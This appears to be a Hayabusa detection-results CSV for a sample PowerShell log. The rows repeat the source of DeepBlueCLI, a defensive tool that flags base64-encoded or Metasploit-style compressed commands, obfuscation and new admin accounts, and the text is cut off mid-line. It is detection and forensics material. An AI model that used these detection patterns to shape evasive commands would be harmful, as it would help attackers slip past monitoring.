$output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ #$eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} """,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:37.559 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:37.559 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:37.559 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:37.562 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ #$eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:37.567 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:37.570 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:50.476 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = 